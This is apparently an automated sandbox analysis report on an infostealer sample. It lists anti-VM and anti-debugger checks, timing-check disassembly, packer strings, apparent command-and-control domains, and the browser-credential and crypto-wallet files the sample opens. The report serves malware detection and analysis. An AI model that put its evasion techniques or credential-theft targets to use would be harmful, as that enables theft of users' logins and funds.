              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 63F9806 second address: 63F980A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407325 second address: 6407329 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407329 second address: 6407340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d jg 00007F5A4D20A9F6h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407620 second address: 6407625 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407625 second address: 640764C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007F5A4D20AA02h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jng 00007F5A4D20A9F6h 0x00000014 jng 00007F5A4D20A9F6h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64077E1 second address: 64077F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC6Dh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 64077F2 second address: 64077F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407AA0 second address: 6407AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407AA8 second address: 6407AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407AB6 second address: 6407ABA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407ABA second address: 6407ABE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407ABE second address: 6407ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407ACA second address: 6407ACE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407ACE second address: 6407AE2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC6Ah 0x00000007 jo 00007F5A4CBCDC66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407AE2 second address: 6407AEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5A4D20A9FCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407C89 second address: 6407CA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC6Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f pop ebx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6407CA1 second address: 6407CC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F5A4D20A9F6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F5A4D20AA02h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409D7F second address: 6409D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409D84 second address: 6409D8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409D8E second address: 6409DBC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4CBCDC72h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007F5A4CBCDC71h 0x00000014 pop edx 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409DBC second address: 628DC20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5A4D20A9FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e jmp 00007F5A4D20AA06h 0x00000013 pop eax 0x00000014 mov eax, dword ptr [eax] 0x00000016 ja 00007F5A4D20A9FEh 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 jmp 00007F5A4D20A9FBh 0x00000025 pop eax 0x00000026 mov esi, dword ptr [ebp+122D3942h] 0x0000002c push dword ptr [ebp+122D0089h] 0x00000032 mov dword ptr [ebp+122D24D6h], eax 0x00000038 call dword ptr [ebp+122D2267h] 0x0000003e pushad 0x0000003f clc 0x00000040 xor eax, eax 0x00000042 sub dword ptr [ebp+122D1DAAh], edi 0x00000048 mov edx, dword ptr [esp+28h] 0x0000004c mov dword ptr [ebp+122D1DAAh], esi 0x00000052 mov dword ptr [ebp+122D38C2h], eax 0x00000058 clc 0x00000059 mov esi, 0000003Ch 0x0000005e jmp 00007F5A4D20A9FDh 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 pushad 0x00000068 mov cl, 82h 0x0000006a cld 0x0000006b popad 0x0000006c mov dword ptr [ebp+122D3522h], edi 0x00000072 lodsw 0x00000074 mov dword ptr [ebp+122D1D0Bh], edi 0x0000007a add eax, dword ptr [esp+24h] 0x0000007e mov dword ptr [ebp+122D1E84h], edi 0x00000084 mov ebx, dword ptr [esp+24h] 0x00000088 jmp 00007F5A4D20AA02h 0x0000008d nop 0x0000008e pushad 0x0000008f js 00007F5A4D20A9F8h 0x00000095 pushad 0x00000096 popad 0x00000097 push eax 0x00000098 push edx 0x00000099 pushad 0x0000009a popad 0x0000009b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409E61 second address: 6409EBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5A4CBCDC77h 0x00000009 popad 0x0000000a popad 0x0000000b xor dword ptr [esp], 5B69A560h 0x00000012 mov ecx, dword ptr [ebp+122D396Ah] 0x00000018 push 00000003h 0x0000001a jmp 00007F5A4CBCDC77h 0x0000001f push 00000000h 0x00000021 mov cx, ax 0x00000024 push 00000003h 0x00000026 sub dword ptr [ebp+122D2527h], ecx 0x0000002c push 48E7B7D1h 0x00000031 pushad 0x00000032 pushad 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409EBA second address: 6409EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d popad 0x0000000e add dword ptr [esp], 7718482Fh 0x00000015 mov edi, 4026F04Bh 0x0000001a lea ebx, dword ptr [ebp+1244FCEFh] 0x00000020 mov ecx, dword ptr [ebp+122D3B82h] 0x00000026 mov dword ptr [ebp+122D1DE1h], ebx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push esi 0x00000030 push ecx 0x00000031 pop ecx 0x00000032 pop esi 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409F6E second address: 6409F73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409F73 second address: 6409F7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F5A4D20A9F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6409F7D second address: 640A031 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a jmp 00007F5A4CBCDC73h 0x0000000f pop ecx 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D2527h], ecx 0x00000017 push 00000000h 0x00000019 mov dword ptr [ebp+12449DE1h], edx 0x0000001f call 00007F5A4CBCDC69h 0x00000024 jmp 00007F5A4CBCDC6Dh 0x00000029 push eax 0x0000002a pushad 0x0000002b jc 00007F5A4CBCDC68h 0x00000031 push ecx 0x00000032 pop ecx 0x00000033 jo 00007F5A4CBCDC70h 0x00000039 jmp 00007F5A4CBCDC6Ah 0x0000003e popad 0x0000003f mov eax, dword ptr [esp+04h] 0x00000043 push edi 0x00000044 push ebx 0x00000045 jmp 00007F5A4CBCDC73h 0x0000004a pop ebx 0x0000004b pop edi 0x0000004c mov eax, dword ptr [eax] 0x0000004e pushad 0x0000004f jbe 00007F5A4CBCDC7Ah 0x00000055 jmp 00007F5A4CBCDC74h 0x0000005a pushad 0x0000005b push edx 0x0000005c pop edx 0x0000005d jmp 00007F5A4CBCDC6Ch 0x00000062 popad 0x00000063 popad 0x00000064 mov dword ptr [esp+04h], eax 0x00000068 jbe 00007F5A4CBCDC74h 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640A031 second address: 640A073 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5A4D20A9F6h 0x0000000a popad 0x0000000b pop eax 0x0000000c cld 0x0000000d push 00000003h 0x0000000f call 00007F5A4D20A9FBh 0x00000014 mov esi, dword ptr [ebp+122D3B0Ah] 0x0000001a pop edx 0x0000001b push 00000000h 0x0000001d sub dword ptr [ebp+12449EE4h], esi 0x00000023 push 00000003h 0x00000025 and si, A046h 0x0000002a call 00007F5A4D20A9F9h 0x0000002f jc 00007F5A4D20AA00h 0x00000035 pushad 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 640A073 second address: 640A085 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007F5A4CBCDC70h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 77BBEE instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 92C56D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 933F34 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 9B4CB9 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 628DBC8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 628DC5D instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 6441568 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5076Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 5160Thread sleep time: -44022s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6416Thread sleep time: -38019s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 2300Thread sleep time: -36000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1220Thread sleep time: -240000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 1036Thread sleep time: -36018s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exe TID: 6712Thread sleep time: -30015s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PublishersJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\SolidDocumentsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
              Source: file.exe, 00000000.00000002.2619814644.000000000615A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2615216038.000000000090B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2620120751.0000000006410000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696487552f
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696487552x
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
              Source: file.exe, 00000000.00000002.2616863520.00000000012F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2616863520.00000000012BB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2619180426.0000000005740000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696487552o
              Source: file.exe, 00000000.00000003.2266576489.0000000005798000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696487552j
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2619180426.0000000005740000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: file.exe, 00000000.00000003.2487332602.0000000001343000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__:!
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696487552s
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696487552t
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
              Source: file.exe, 00000000.00000002.2615216038.000000000090B000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2620120751.0000000006410000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
              Source: file.exe, 00000000.00000003.2266576489.0000000005793000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
              Source: file.exe, 00000000.00000002.2619814644.000000000615A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: file.exe, 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p3ar11fter.sbs
              Source: file.exe, 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: 3xp3cts1aim.sbs
              Source: file.exe, 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: peepburry828.sbs
              Source: file.exe, 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: p10tgrace.sbs
              Source: file.exe, 00000000.00000003.2183332592.0000000004D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: processhol.sbs
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
              Source: file.exe, 00000000.00000002.2615216038.000000000090B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: oE_v^Program Manager
              Source: file.exe, 00000000.00000002.2615216038.000000000090B000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: E_v^Program Manager
              Source: file.exe, 00000000.00000002.2620120751.0000000006410000.00000040.00000800.00020000.00000000.sdmpBinary or memory string: WtProgram Manager
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: file.exe, 00000000.00000003.2487153281.000000000134C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342127715.0000000001361000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2401848411.000000000134D000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2496752688.000000000133F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342318198.0000000001361000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2342289926.000000000134C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3180, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: file.exe, 00000000.00000003.2242304214.0000000001354000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: s/Electrum-LTC)n'
              Source: file.exeString found in binary or memory: Jaxx Liberty
              Source: file.exeString found in binary or memory: ExodusWeb3
              Source: file.exeString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: file.exeString found in binary or memory: keystore
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
